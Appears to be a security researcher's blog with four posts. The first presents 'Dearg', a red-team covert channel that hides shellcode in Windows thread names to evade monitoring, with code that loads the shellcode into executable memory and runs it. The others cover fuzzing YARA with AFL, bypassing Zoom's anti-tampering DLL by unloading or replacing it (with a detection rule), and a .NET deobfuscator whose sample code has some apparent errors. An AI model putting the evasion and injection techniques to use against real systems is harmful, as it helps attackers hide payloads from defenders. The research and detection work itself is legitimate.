11 Feb 2021

Stealthy Process Communication Between Threads on Windows 10

Introduction

Whilst playing with a Cobalt Strike beacon, I was thinking of ways that the artefact kit could be improved on in terms of IPC (“Inter-Process Communication”). The de facto standard is usually to use named pipes, usually as a way to read shellcode from inside a process we’ve injected into.

The new communication method won’t be observable by existing tools - the unusual IPC channel used will evade logging and audit/alarm based triggers.

Standard tooling won’t be able to pick up the transactions between the threads, much like ProcMon (and like) would be able to do on traditional Windows file operations. By choosing a rarely used feature to abuse as a custom IPC channel, for the purpose, tools would be needed to enable the normal volume and granularity of IPC data.

All we need to utilise this method is a HANDLE to the thread, with THREAD_QUERY_LIMITED_INFORMATION permissions. This flag also works on protected processes, as THREAD_QUERY_INFORMATION does not.

I’ve called this project Dearg, which means red in Gaelic, a GitHub project exists here with all of the code for the project. How the client speaks to a serving thread is briefly outlined below:

client

Technique

The technique relies on the fact that we can modify the ThreadName member within the ETHREAD structure. The ETHREAD structure contains information about a thread and is stored in kernel space. We can fetch information about a thread using the NtQueryInformationThread system call, or the friendlier user-mode API GetThreadInformation, and subsequently set information about a thread using NtSetInformationThread, and SetInformationThread. I’ve attempted to make this technique follow the model of client <-> server as much as possible, where the client is fetching whatever buffer from another thread, and the server hosting it.

Using the handy ntdiff, we can see the difference between the ETHREAD structure in the last release of Windows 7, and Windows 10 1607, in ntoskrnl.exe. ThreadName does not exist, this technique can only be applied to Windows 10 1607 (which was released in 2016), and above.

/* 0x07c8 */ struct _UNICODE_STRING* ThreadName;

diff

This member is stored as a UNICODE_STRING object, the standard Windows structure for a Unicode string. We’re going to overwrite the Buffer field, the actual string, with our data we want to communicate to another thread. As above-mentioned, this can be trivially accessed using standard APIs.

To access this field, at a minimum, we need one of the below permissions when getting a HANDLE to the target thread. We’ll take the “principle of least privilege” model - and opt for the lowest permission we can get away with, which is THREAD_QUERY_LIMITED_INFORMATION. It’s noteworthy that THREAD_QUERY_INFORMATION won’t work on protected processes, however the limited information class will.

THREAD_QUERY_INFORMATION (0x0040)	Required to read certain information from the thread object, such as the exit code (see GetExitCodeThread).

THREAD_QUERY_LIMITED_INFORMATION (0x0800)	Required to read certain information from the thread objects (see GetProcessIdOfThread). A handle that has the THREAD_QUERY_INFORMATION access right is automatically granted THREAD_QUERY_LIMITED_INFORMATION. Windows Server 2003 and Windows XP: This access right is not supported.

As this is a UNICODE_STRING buffer, by design, the buffer’s actual size is calculated by looking at the length of the string. In order for the data to be present within this buffer, and for the entire buffer to be returned when we make a fetch call to it, we need to ensure that it doesn’t contain a null-terminator (0x00 0x00). In an attempt to circumvent this, we’ll encode the data with a simple 1-byte XOR key until the null terminator does not exist within the buffer. To find this key, we’ll just keep incrementally encoding until we’ve got a sane buffer - we unfortunately won’t be able to serve the data to the client if we can’t eliminate the bytes.

Initially, I didn’t have a simple permission model setup for this trivial protocol. However, I’ve defined the server as telling the client if the data is writeable/readable. The client must respect the header’s permissions, as this isn’t implemented at a lower abstraction level (i.e. the Windows I/O permission model).

We’ll store this key in a packed header, along with magic at the start (so we can derive it from other threads), the length of the stored buffer, the data’s permissions, and a CRC32 checksum to ensure data integrity.

#define DEARG_HEADER_MAGIC 0x1337BEEF

typedef enum DEARG_FLAGS {
	DEARG_WRITE = 1,
	DEARG_READ = 2,
	DEARG_READWRITE = 3
} DEARG_FLAGS;

#pragma pack(push, 1)
typedef struct DEARG_HEADER {
	DWORD32 dwMagic;
	DEARG_FLAGS dfFlags;
	DWORD32 dwChecksum;
	UINT16 u16Len;
	BYTE bKey;
} DEARG_HEADER, *PDEARG_HEADER;
#pragma pack(pop)

I found in tests the maximum buffer we could store in the Buffer structure was around USHRT_MAX - , likely a hard limit imposed under the hood in the kernel. So, the maximum amount we can store in this buffer is around USHRT_MAX - sizeof(UNICODE_STRING) - sizeof(DEARG_HEADER). So, we need to do the following to construct our payload:

  1. Set the magic to our HEADER_MAGIC value.
  2. Calculate the CRC32 hash of the data, set our dwChecksum header member.
  3. If the buffer contains the string terminator, loop from 0x0 to 0xFF trying to find a key that encodes our data to ensure the terminator doesn’t exist. Leave this value at 0 if we don’t need to encode.
  4. Construct the buffer, write the header, then write the encoded buffer.

To make this process easier, I’ve pushed a helper wrapper to GitHub here. You can plug this into your code at will. Other methodologies outlined below are included in the repository too!

Server

Our “server” will host the data, in a way which is described above. You can choose the main thread, or any other thread, to host the payload in ThreadName. For example, we can go ahead and host the data in the current thread. In this instance, we’re going to host a simple bit of x86 shellcode which executes calc.exe:

int main(int argc, char** argv)
{
	BYTE bShellcode[] = \
		"\x89\xe5\x83\xec\x20\x31\xdb\x64\x8b\x5b\x30\x8b\x5b\x0c\x8b\x5b"
		"\x1c\x8b\x1b\x8b\x1b\x8b\x43\x08\x89\x45\xfc\x8b\x58\x3c\x01\xc3"
		"\x8b\x5b\x78\x01\xc3\x8b\x7b\x20\x01\xc7\x89\x7d\xf8\x8b\x4b\x24"
		"\x01\xc1\x89\x4d\xf4\x8b\x53\x1c\x01\xc2\x89\x55\xf0\x8b\x53\x14"
		"\x89\x55\xec\xeb\x32\x31\xc0\x8b\x55\xec\x8b\x7d\xf8\x8b\x75\x18"
		"\x31\xc9\xfc\x8b\x3c\x87\x03\x7d\xfc\x66\x83\xc1\x08\xf3\xa6\x74"
		"\x05\x40\x39\xd0\x72\xe4\x8b\x4d\xf4\x8b\x55\xf0\x66\x8b\x04\x41"
		"\x8b\x04\x82\x03\x45\xfc\xc3\xba\x78\x78\x65\x63\xc1\xea\x08\x52"
		"\x68\x57\x69\x6e\x45\x89\x65\x18\xe8\xb8\xff\xff\xff\x31\xc9\x51"
		"\x68\x2e\x65\x78\x65\x68\x63\x61\x6c\x63\x89\xe3\x41\x51\x53\xff"
		"\xd0\x31\xc9\xb9\x01\x65\x73\x73\xc1\xe9\x08\x51\x68\x50\x72\x6f"
		"\x63\x68\x45\x78\x69\x74\x89\x65\x18\xe8\x87\xff\xff\xff\x31\xd2"
		"\x52\xff\xd0";

	// initialise the header
	DEARG_HEADER dHdr;
	if (!dearg_init_hdr(&dHdr))
	{
		return 0;
	}

	// attempt to serve the shellcode
	DEARG_STATUS dStatus = dearg_serve(GetCurrentThread(), DEARG_READ | DEARG_WRITE, &dHdr, bShellcode, sizeof(bShellcode));
	if (dStatus != DSERVE_OK)
	{
		switch (dStatus)
		{
		case DSERVE_ERROR_KEY:
			puts("failed to find a suitable key");
			break;

		case DSERVE_ERROR_SET:
			puts("failed to set the thread name");
			break;

		case DSERVE_ERROR_ALLOC:
			puts("a memory allocation failure occured");
			break;

		case DSERVE_INVALID_PARAMS:
			puts("the parameters were invalid");
			break;
		}

		return 0;
	}

	printf("Serving %d bytes of content on thread ID %d using key 0x%X\n", sizeof(bShellcode), GetCurrentThreadId(), dHdr.Key);
	return 1;
}

Using the tname_init_hdr method will construct the header for us. The dearg_serve method sets up the header for us, finds an appropriate key to encode (if needed), and sets the ThreadName.

Client

As the client, we somehow need to find the thread which is our server in this case. We can differentiate the read that is hosting the data by reading the ThreadName, and checking for our magic 0x1337BEEF. After we’ve read the header, if we need write access, we need to re-open the handle with THREAD_SET_INFORMATION. Next, we read the length of the data in the u16Len member. After this, we read the data which is placed after the header and place it into a buffer. We then get a hash of the data, and compare it against the hash in the header - this ensures that the data we’re reading has gone untampered.

The way in which you find the thread is totally up to the implementation, you could walk all the threads on the system, or pass the thread ID some other way. In the example below, we read shellcode from a thread with an ID of 1337, and execute the shellcode it is serving.

HANDLE hThread = OpenThread(THREAD_QUERY_LIMITED_INFORMATION, FALSE, 1337);
if (hThread == INVALID_HANDLE_VALUE)
{
	return FALSE;
}

DEARG_HEADER dHdr;
RtlSecureZeroMemory(&dHdr, sizeof(DEARG_HEADER));

// first, get the buffer size by heading the header
if (dearg_read(hThread, &dHdr, NULL, 0) != DSERVE_NO_DATA_OUT) 
{
	return FALSE;
}

// allocate the executable memory with the size from the header
LPVOID lpMem = VirtualAlloc(NULL, dHdr.u16Size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (lpMem == NULL)
{
	return FALSE;
}

// read in the data
if (dearg_read(hThread, &dHdr, lpMem) != DSERVE_OK) 
{
	return FALSE;
}

// execute the shellcode
((VOID(*)())lpMem)();

Conclusion

This method of communicating between processes could serve extremely useful if wanting to communicate between process under the radar. If anyone has any additions to this, feel free to get in touch with me, preferably via email: [email protected]

Limitations

The structure member within ETHREAD that we’re weaponising to communicate, ThreadName, only exists on Windows 10 1607 and higher.

Without the THREAD_QUERY_LIMITED_INFORMATION access for the target thread handle, you won’t be able to fetch the ETHREAD member.

There is no sort of exclusive lock implemented, unlike actual file objects on Windows.

We can have a maximum shellcode buffer size of around USHRT_MAX - sizeof(UNICODE_STRING) - sizeof(DEARG_HEADER)

We need to ensure that a null terminator, \x00\x00, within the main body of UNICODE_STRING::Buffer does not exist. The wrapper attempts to find a key which satisfies this requirement.

windows red-team ipc dearg

10 May 2020

I’ve always been interested in fuzzing YARA to see if anything interesting would be produced. Whilst I didn’t manage to crash YARA when following the methodology that this post outlines whilst targeting the PE module – it’d be great to hear recommendations on how the process I followed upon could be improved on that I’ve made in my YARA fuzzing venture. We’ll be using the excellent american fuzzy lop (a.k.a. “AFL”) as the choice of fuzzer. If we were to find a parsing bug in YARA, it could possibly lead to code execution if a victim (in this case) runs our specially crafted executable through it. Fuzzing is a common method for finding vulnerabilities in software, in particular memory management vulnerabilities. It involves executing the target binary with various input values generated by the fuzzer, to test the program - the goal is to get it to crash.

YARA is a handy tool in the world of malware research, it enables researchers to classify files based on specific parameters such as a sequence of bytes, or format-specific attributes such as function imports in the Import Address Table (“IAT”). The aim of YARA rules is to identify files such as to classify malware samples. It was developed by Victor Alvarez of VirusTotal (“VT”) to identify familes of malware specifically. The YARA tool allows signature-based malware classification similar to AV products.

An example of a simple YARA rule to match a DLL which has the ASCII string "YARA example" and has a sequence of bytes: 0xDE, 0xEA, 0xAD can be observed below.

rule Exemplar
{
    meta:
        description = "A simple example of a YARA rule"
        author = "LloydLabs"

    strings:
        $ = "YARA example"
        $ = {DE EA AD}

    condition:
        all of them
}

When developing YARA rules, I highly recommend installing the YARA extension for Visual Studio Code – which can be found here. We have three sections, a meta section which contains any sort of metadata; a strings section which contains the patterns to match; and; the condition section which is used to define the conditions for the rule.

I wanted to target the PE module within YARA, which provides functionality to parse PE-specific fields. An example of this is accessing the DllCharacteristics flag within the OptionalHeader within the PE structure. At the same time, the rule will also check if the PE is a DLL. The module makes easy work of this - below, we can observe how this would be written within the condition section:

import "pe"

rule Exemplar
{
    condition:
        pe.is_dll() and pe.dll_characteristics & pe.DYNAMIC_BASE
}

In YARA 4.0, multiple new additions were made to the already extremely handy module. I wanted to target the following functions, and make sure we would have complete coverage of them all when the rule was hit:

pe.pdb_path
pe.exports_index(..)
pe.export_details(..)
pe.dll_name
pe.export_timestamp

The rule language which YARA is based on is parsed using GNU Bison, which is an extremely mature parsing generator which has been actively developed since the 1980s (not that this is any excuse). I thought the time would be wasted on targeting this aspect of YARA, and instead the fuzzing efforts would be more successful when targeting the PE parser that they implement themselves. All of the functionality for YARA is contained within libyara, the command-line version of YARA simply uses this library as an easy way to utilise it. Here, we can see the code for the PE module. Here is an example of the code within, which is responsible for parsing the PDB path:

if (yr_le32toh(cv_hdr->dwSignature) == CVINFO_PDB20_CVSIGNATURE)
{
  PCV_INFO_PDB20 pdb20 = (PCV_INFO_PDB20) cv_hdr;

  if (struct_fits_in_pe(pe, pdb20, CV_INFO_PDB20))
    pdb_path = (char*) (pdb20->PdbFileName);
}
else if (yr_le32toh(cv_hdr->dwSignature) == CVINFO_PDB70_CVSIGNATURE)
{
  PCV_INFO_PDB70 pdb70 = (PCV_INFO_PDB70) cv_hdr;

  if (struct_fits_in_pe(pe, pdb70, CV_INFO_PDB70))
    pdb_path = (char*) (pdb70->PdbFileName);
}

If we want to test all of these features, we need to design a YARA rule which hits all of the code paths which result in these new features being tested. Below, we can see the route that we want to take.

Some of the rules accepted different types of arguments (which can be seen in the documentation for the module), e.g. the pe.exports_index supports a string (e.g. pe.exports_index("DllRegisterServer")) and also the ordinal (e.g. pe.exports_index(1337)). We can achieve this by writing a rule to hit all of these conditions by simply using or between all of the different checks. The rule I came up with when fuzzing YARA was:

import "pe"

rule Fuzzawuzza
{
    condition:
        pe.pdb_path == "FUZZ" or pe.dll_name == "FUZZ" or pe.imports(/kernel32.dll/i, /(Read|Write)ProcessMemory/) == 2 or pe.exports_index(/^[email protected]@/) or pe.exports_index(72) or pe.exports_index("CPlApplet") or pe.export_details.name == "FUZZ" or pe.export_timestamp == 1337
}

We’ll then go ahead and save this rule as test_rule.yar for use further down the line. The objective of fuzzing in this instance was to crash YARA, my choice of fuzzer will be AFL by Google.

To do this we’ll feed AFL a legitimate PE binary which will be mutated and changed. First of all, as we have access to the source code of YARA due to it being open source, we need to instrument the binary. afl-gcc is based upon LLVM and a wrapper for GCC, and will inject code into the source code that it is compiling. This way, the fuzzer based on the inputs that it gives the program can find the best and most succesful code paths within the source code. An example of this in the context of YARA could be the initial verification of the file having the MZ header, AFL would work out that an invalid header leads to less code paths and hence less coverage of the program as a whole, this would then be reflected in the mutations that the fuzzer would take in the future. We could also fuzz without the source code, however it makes the fuzzing a lot faster as we can find relevant routes in the code that AFL should target based on it mutating the input file quicker.

First of all, we need a server. With the help of David Cannings, we managed to get a 16-core Google Cloud instance with 64GB of RAM. Fuzzing in the cloud isn’t always the most cost-efficient way to do it, however this was simply for a week. The distribution I’ll be using throughout this is Ubuntu 18.04.4 LTS (love it or hate it 😉). Next, we need to install AFL:

sudo apt install build-essential automake libtool make gcc pkg-config libssl-dev # this was a new box, we need this for make, etc.
wget http://lcamtuf.coredump.cx/afl/releases/afl-latest.tgz
tar -xvf afl-latest.tgz
cd afl-latest
sudo make install

Next, let’s go and grab the latest YARA release from GitHub and install it in this case, 4.0.0. We’ll then run afl-gcc against it, which will instrument it ready to be fuzzed by afl-fuzz.

# Pull down YARA
wget https://github.com/VirusTotal/yara/archive/v4.0.0.tar.gz
tar -xvf v4.0.0.tar.gz
cd v4.0.0.tar.gz

# Set our default compiler in the current env to afl-gcc
CC=afl-gcc

# Install YARA
./bootstrap.sh
./configure
sudo make install

# For some reason, libyara isn't found, we need to add it to our LD_PRELOAD path
sudo echo "/usr/local/lib" >> /etc/ld.so.conf
ls -la /etc/ld.so.conf

We now have YARA setup on our machine:

$ yara -v
4.0.0

AFL documents some performance tips here, which I applied to the current instance in order to maximise the efficiency when fuzzing. It doesn’t really matter in terms of anything else, as this instance is simply for fuzzing. Looking at the AFL documentation, the following command line arguments are given as a boilerplate:

./afl-fuzz -i testcase_dir -o findings_dir /path/to/program @@ [..params..]

OK, so in our case. We need a PE file in our input (-i) directory, and our /path/to/program needs to be simply yara. The @@ detonates the PE file that AFL will be mutating to fuzz YARA. We’ll just take the classic calc.exe from Windows to base the mutations on.

YARA takes the following arguments when it wants to scan a file:

yara [rule] [file_path]

Our rule, as abovementioned, as already been configured and is saved as test_rule.yar. So, putting this together we get:

mkdir yara_in # Input directory
afl-fuzz -i yara_in -o yara_out yara test_rule.yar @@

Now, AFL has started, and we’ve got this screen:

What, 203.9 executions per second seems a bit slow for a 16 core machine. Let’s go check htop, and see if all of the cores are being used:

OK, not at all. It’s only using one core, which is strange. I thought at first AFL would utilise all of the resources on the system unless told otherwise, but looking at the documentation it says:

Every instance of afl-fuzz takes up roughly one core. This means that on multi-core systems, parallelization is necessary to fully utilize the hardware. For tips on how to fuzz a common target on multiple cores or multiple networked machines, please refer to Tips for parallel fuzzing.

I came across this tool named afl-launch on GitHub here, which allows us to easily launch multiple fuzzers in parallel. Since AFL uses about one core per instance, we’ll want to spin up 16 instances of it. It requires Go, so lets set it up:

sudo apt install golang-go
go get -u github.com/bnagy/afl-launch

Now we’ve set up afl-launch for our user, we need to execute it. Instead of using an output drive when running a single instance of AFL, the directory is called a sync drive, where the subdirectories are that of running AFL instances in parallel.

afl-launch -n 16 -i yara_in -o yara_out yara test_rule.yar @@

Finally we’re using all of that cores that are avaliable at our disposal:

Unlike running a single instance of AFL, which shows us the abovementioned output screen, we can’t do this when fuzzing in parallel. Luckily, afl-whatsup exists. Running this tool and pointing it at our sync directory will show the status of all of the fuzzers. We’ll execute it through watch, which will execute the commands by default every 2 seconds - giving us somewhat of a live update of the status.

watch afl-whatsup yara_out

If you want to pause the fuzzing process across all of your instances, I’d recommended using afl-pause from afl-trivia by Ben Nagy. He’s developed a bunch of awesome scripts which can help you control your AFL instances when they’re running in parallel. To pause the fuzzing process, all you need to do is his pause script: afl-pause <sync_directory>.

During the fuzzing process, as mentioned, AFL will mutate our input file and craft it based on the best route through the program it can find. The process, as detailed in their README.md, goes along the lines of:

Unfortunately, after 1.2 billion executions of YARA, we failed to crash it. So, kudos to the YARA development team and for all of their hard work over the years maintaining such a staple of a tool! I hope this wasn’t too boring and gave you a small introduction to the world of fuzzing, and things you may come across when setting up your fuzzing environment.

Future Work

To demonstrate fuzzing techniques at a later stage, I am going to work on a project named Damn Vulnerable File Parser - a very vulnerable (hence the name), file parser written in C to demonstrate with ease how programs can be fuzzed and lead to them crashing. We could also target older versions of YARA, which are likely to still be in use by organisations and fuzz to find crashes which haven’t already been patched in those versions.

I’m new to using AFL, and fuzzing YARA-like projects in general - if there’s anything that I could’ve changed in my approach in fuzzing YARA please let me know! I’m contactable on Twitter or at [email protected]. I’d be happy to take on any recommendations!

re yara

03 Apr 2020

Introduction

This quick blog post highlights some of the flaws found in the Zoom application when attempting to do integrity checking, these checks verify that the DLLs inside the folder are signed by Zoom and also that no 3rd party DLLs are loaded at runtime. We can trivially disable this DLL, by replacing it with our own or simply unloading it from the process.

This post highlights how we can bypass Zoom’s anti-tampering detection, which aims to stop DLLs from being loaded or existing ones modified. The functionality is all implemented by Zoom themselves within a DLL named DllSafeCheck.dll.

I have also included a YARA rule at the end of this blog post, in case this technique is used by an advisory in the future.

I’ll cover these flaws:

  • The DLL is not pinned, meaning an attacker from a 3rd party process could simply inject a remote thread, and call FreeLibrary after getting a handle to the DLL.
  • Ironically while all the DLLs checked by the anti-tampering DLL MUST have a valid Microsoft Authenticode signature to pass the checks, the anti-tampering DLLs integrity or signing status are NOT checked at all. This seems like an oversight from the Zoom developers considering all the checks that are currently performed in the DllSafeCheck DLL.

Zoom Client

Zoom is entirely programmed in C++ and makes heavy use of the Windows API. The executable and the DLLs that are used are installed to %APPDATA%\Zoom\bin and is completely writeable. All of the executables that are used are signed by Zoom themselves, as we can see below when extracting the certificate.

PS AppData\Roaming\Zoom\bin_00> Get-PfxCertificate util.dll

Thumbprint                                Subject
----------                                -------
0F9ADA46756C17EFFFD467D10654E2A766566CB3  CN="Zoom Video Communications, Inc.", O="Zoom Video Communications, Inc.", L=San Jose, S=California, C=US, SERIALNUMBER=4969967, OID.2.5.4.15=Pr...

Most of the functionality within Zoom resides within the DLLs. Below, we can see the DLLs which are included within the export table. Take notice of the DllSafeCheck.dll; the is the library we will be analysing.

Looking further at the use of DllSafeCheck.dll, we can see that it exports a function named HackCheck.

If we then cross-reference the calls to this function using our favourite disassembler, IDA in this instance, we can see that it is called at the entry point of the program within WinMain before any other operations are completed. Below, we can see the function prologue and the immediate call to HackCheck.

DllSafeCheck.dll

As abovementioned, the Zoom client will call the HackCheck function (which is the only export from the DLL, apart from DllMain), upon execution. Two events are created to detect the loading and unloading of the DLL, by resolving LdrUnregisterDllNotification and LdrRegisterDllNotification to register it.

To start, the export first starts by verifying that it is not running on an old version of Windows, using a mixture of VerSetConditionMask and VerifyVersionInfoW. After the Windows version has passed these checks, it will continue execution. It then will gather the Windows process token information through the usual means of getting a handle for the current process, then calling GetTokenInformation. This data is then saved for further use.

A path to Zoom’s %APPDATA% folder is then constructed, and a log file named dllsafecheck.txt is created. A thread is then created, which waits for log events to be sent to it. Below, we can see the creation of this file.

We then get to the core functionality of the DLL, which is scanning the modules which are loaded in the current process and making sure that they’re signed by Zoom. It will gather a list of the modules, and then check to see if they are signed, below, we can see the enumeration of the certificate chain to check against the hardcoded Zoom Video Communications, Inc. string.

if ( v10->csCertChain )
{
    do
    {
        v12 = WTHelperGetProvCertFromChain(v10, v11);
        if ( !v12 )
            break;
            
        v13 = v12->pCert;
        if ( v13 )
        {
            v15 = CertGetNameStringW(v13, 4u, 0, 0, 0, 0); // get alloc len
            v16 = v15;
            if ( v15 )
            {
                v14 = HeapAlloc(NULL, 0, 2 * v15);
                if ( v14 )
                {
                    v20 = 0;
                    do
                    {
                        v14[v20++] = 0;
                    }
                    while (v20 < (2 * v15));

                    if (!CertGetNameStringW(v13, 4u, 0, 0, (LPWSTR)v14, v16))
                    {
                        HeapFree(NULL, 0, v14);
                        v14 = 0;
                    }
                }

                v10 = v26;
            }
            else
            {
                v14 = 0;
            }
        }
        else
        {
            v14 = 0;
        }

    if ( !v25 )
        v25 = L"Zoom Video Communications, Inc.";

If the executable is not signed by Zoom, it will prompt the user to ask if it wants it to be run in the process.

Trivial to unload from process

Ironically while all the DLLs checked by the anti-tampering DLL must have a valid Microsoft Authenticode signature to pass the checks, the anti-tampering DLLs integrity or signing status are not checked at all. This seems like an oversight from the Zoom developers considering all the checks that are currently performed in the DllSafeCheck DLL.

An immediate issue is that this DLL can be trivially unloaded, rendering the anti-tampering mechanism null and void. The DLL is not pinned, meaning an attacker from a 3rd party process could simply inject a remote thread, and call FreeLibrary after getting a handle to the DLL.

One possible fix for this would be to perform GetModuleHandleExA, and passing in the GET_MODULE_HANDLE_EX_FLAG_PIN flag. This ensures that the module stays loaded within the process until it terminates, rendering FreeLibrary calls useless.

HMODULE hSafeCheck = NULL;
if (GetModuleHandleExA(GET_MODULE_HANDLE_EX_FLAG_PIN, "DllSafeCheck.dll", &hSafeCheck))
{
    // Loaded module successfully
}

We can unload it using the traditional, and well-documented method of: 1) HANDLE of Zoom process using OpenProcess 2) Enumerate the loaded modules in the process, using EnumProcessModules, and find a handle to DllSafeCheck.dll 3) Resolve the address of “FreeLibrary” using GetProcAddress 4) Create a thread in the process using CreateRemoteThread, with the starting routine as the FreeLibrary address, and the parameter as the handle to DllSafeCheck. 5) The anti-tampering DLL is now unloaded 6) We can now inject any DLL we want

I’ve created simple POC (basic CreateRemoteThread DLL injection, nothing fancy) for unloading the anti-tampering DLL and injecting our own. You can contact me at [email protected] if you want to see it.

Anti-tampering DLL can be replaced on disk

When loading the DLL, Zoom does not check the signature of the integrity of the file. I’m not sure why this is not checked at all, considering all of the checks which are done in the DllSafecheck DLL regarding executable signature vertification. This remains a mystery. A threat actor could leverage this to enable their unsigned, non-Zoom DLL to be loaded into the context of a signed executable as a host for their malicious code.

The folder which Zoom resides in is writeable, which also contributes to this attack.

A simple DLL named DllSafeCheck.dll can be compiled implementing the HackCheck export. For clarity, the malicious DLL which is used is not signed. We can see the result of querying the executable signature below.

PS AppData\Roaming\Zoom\bin_00> Get-AuthenticodeSignature DllSafeCheck.dll

SignerCertificate                         Status                                 Path
-----------------                         ------                                 ----
                                          NotSigned                              DllSafeCheck.dll

The following code was used for this PoC:

VOID __declspec(dllexport) CheckHack()
{
	MessageBox(NULL, L"LloydLabs", L"Oops!", MB_APPLMODAL);
}

Here, we can see the the alert when loading Zoom.

How could a threat actor realistically exploit this?

A malicious DLL could be bundled with Zoom, and sent to a victim - this would result in the payload (e.g. Cobalt Strike), being executed under the context of the Zoom process. A threat actor could also abuse these issues to persist both across reboot and in memory on a target system, this is a much cleaner approach compared to the alternatives of registering some startup event.

YARA rule

import "pe"
rule Zoom_Plant {
    meta:
        date = "2020-04-03"
        author = "LloydLabs"
        url = "https://blog.syscall.party"
	
    condition:
        pe.characteristics & pe.DLL and pe.exports("HackCheck") and pe.number_of_exports == 1 and (pe.issuer contains "Zoom Video Communications, Inc.")
}

Conclusion

Thank you for reading this brief blog, if you wish to contact me I can be emailed at: [email protected] - I’m a 3rd year undergraduate student, and open to opportunities and collaboration. Cheers!

zoom re ida

18 Nov 2019

Introduction

When a threat actor wishes to circumvent analysis from a reverse engineering standpoint, a common technique utilised by the attackers is to obfuscate their malicious code. This can be done in several ways and may include control flow obfuscation (making the flow of the program confusing, random jumps..), string obfuscation (not having text in plain sight, may be encrypted, encoded..), junk code (pointless code which does nothing, merely a way to confuse analysts), object renaming (renaming objects within the code from their original, e.g. MainService may become OQuXiqmXq throughout the code). To get around this, you can create your own tooling to deobfuscate binaries and strip them of these circumventions automatically. This is easier to achieve when managed code is involved as they’re typically much more comfortable to manipulate, for .NET we’ve got dnlib, and for Java, we have ASM.

The abovementioned libraries make it much easier to manipulate and change executables, in this post we’ll be writing a simple .NET deobfuscator using dnlib against a prolific RAT (“Remote Administration Tool”) - this can easily be extended and changed to suit your needs based on the challenges you face with a specific managed executable. I have mimicked the protections which we’d see in this RAT for the purpose of this writeup.

By the end of this, we’ll have a working deobfuscator which will strip some of the protections that the attacker has applied to the .NET assembly.

The steps we’ll take

Everyone loves diagrams, right? This is a basic breakdown of the process we’ll take to achieve deobfuscation.

Initial static code analysis

Taking a look at the executable, it employs an extremely basic class, and method obfuscation technique of using a randomly generated 10 character string prepended to all of the declarations. The strings are obfuscated strangely, containing a ‘|’ character they’re split by using the main string used throughout - so we’ll have to do some instruction patching too to get rid of this and split it ourselves. You can download the executable from here that we’re going to use as an example - please note, it’s just full of useless code.

Using dnSpy, we can easily open the binary and recover the source code from the .NET assembly. If you’ve not already got dnSpy, you can get it from here. Opening it in dnSpy, we see the following structure:

As previously mentioned, I’ve created the scenario where the module name is prepended as a way for obfuscation. Looking at one of these classes deeper, we can see the other obfuscation techniques that were mentioned:

We can see all of the methods within the above class have the string appended to them, along with the strings within the binary being split by the | character.

Writing the deobfuscator

You’ll need to install dnlib, the easiest way to achieve this is using Nuget which is within Visual Studio (Projects -> Add Nuget Package -> Browse). We’ll create a Console Application, using C# as our language choice and create a basic skeleton in which a user can pass in an input assembly and output one.

Our basic process is going to be:

  • Grab the encoded string based on the PE timestamp
  • Rename all of the classes back to their original
  • Rename all of the methods within the classes back to their original names

Let’s start by creating a new console C# project in Visual Studio, import the namespaces we need, and make a basic boilerplate for passing in two arguments. The first argument being the executable we want to deobfuscate, and the second the path we want to output to.

using System;
using dnlib.DotNet;
using dnlib.DotNet.Emit;

Next, let’s get to using dnlib. We’ll want to pass in our path to the library as a module, an executable, and attempt to load it. As seen in the initial static analysis stage, the module name is AfmAcgnNGYtN9H. So, we’ll gather the assembly name at the same time. Where fullPath is the variable name of the path to the executable.

var module = ModuleDefMd.Load(fullPath);
if (module == null)
{
    return;
}

string moduleName = module.Assembly.Name;

We can then call the GetTypes to get a collection of all of the types that exist in the module, this will return classes, functions, body of functions and more. As we saw in the static analysis of the executable, all of the classes and methods had the unique string prepended to them, along with the string obfuscation being present within some of these methods. We’ll start by simply renaming all of the ‘types’ (classes, methods, etc.) back to their original, human-readable name.

What’s beautiful about dnlib is that it’ll automatically rename the method across the entire assembly, so we don’t need to cross-reference calls to it and manually change everything.

foreach (var type in module.GetTypes())
{
    if (type.Name.Contains(moduleName)) // does our method name contain the bad string?
    {
        method.Name = Method.Name.Replace(moduleName, string.Empty); // replace with nothing
    }
    ...

After this, all of the methods will now be renamed like so:

AfmAcgnNGYtN9HGetCount -> Functionality
AfmAcgnNGYtN9HBadServer -> BadServer
..and so on

That part was relatively easy, right? Let’s move onto removing the string obfuscation which is contained within the binary. As abovementioned, all of the obfuscation when it comes to strings looks like this:

string realString = "Hello world!|AfmAcgnNGYtN9H".Split('|')[0];

We’ll need to edit the assembly manually, finding the Common Intermediate Language (“CIL”) instructions that are responsible and remove them. When a string is concerned, the ldstr OpCode is used with the first and only operand being the string we want to load. We can further look at this in dnSpy, if we select Edit IL assembly within the method body. For example, this function here:

private static string AfmAcgnNGYtN9HMalicious()
{
	return "This is a bad string|AfmAcgnNGYtN9H".Split(new char[]
	{
		'|'
	})[0];
}

Will look like this in CIL operations when we disassemble it:

We’ll want to keep the original string which is This is a bad string - we’ll achieve this by splitting the string ourselves and NOP’ing out the rest of the string splitting. When we NOP something, we’re effectively telling the Common Language Runtime (“CLR”) to do nothing. As a resource for a complete list of instructions that’re implemented, you can find them here.

We’ll want to NOP the next 9 sets of opcodes after the ldstr instruction when we find it in the body of a method to produce something like this:

Which, in actual code terms, produces this:

private static string AfmAcgnNGYtN9HBadServer()
{
	return "This is a bad string";
}

So, going back into writing the obfuscator - we’ll want to keep in the loop where we’re going through each type however add a new one within it. After this, we’ll go each method and check if it has a body (code), then continue to iterate over each of the instructions within there until we find an ldstr instruction. To verify the string has been obfuscated, we’ll then check if it’s being split by the predefined string (AfmAcgnNGYtN9H) and remove the splitting logic.

...
foreach (var method in type.Methods)
{
    if (!method.HasBody) // does the method contain code?
    {
        continue;
    }

    for (int i = 0; i < method.Body.Instructions.Count; i++)
    {
        if (method.Body.Instructions[i].OpCode != OpCodes.Ldstr)
        {
            continue;
        }

        string originalStr = method.Body.Instructions[i].Operand.ToString();
        if (string.IsNullOrEmpty(originalStr))
        {
            continue; // for some reason, we can't recover the string. Let's keep going.
        }

        // split by the garbage that's added
        string[] parts = originalStr.Split("|AfmAcgnNGYtN9H");

        // check the garbage is there
        if (parts.Len != 2)
        {
            continue;
        }

        // ok, we've found a bad string, lets change our old one over to our recovered string
        method.Body.Instructions.Insert(i, new Instruction(OpCodes.Ldstr, parts[0]));

        // now, lets remove the next 9 set of opcodes and replace with them a NOP
        for (int j = 0; j < 9; j++)
        {
            method.Body.Instructions[i + j] = OpCodes.Nop;
        }

        // increment our opcode counter
        i += 9;
    }
}

Finally, we’ll want to write the modified assembly back to an executable (where outPath is our path we want to write to). This will save all of our changes we’ve made.

module.Write(outPath);

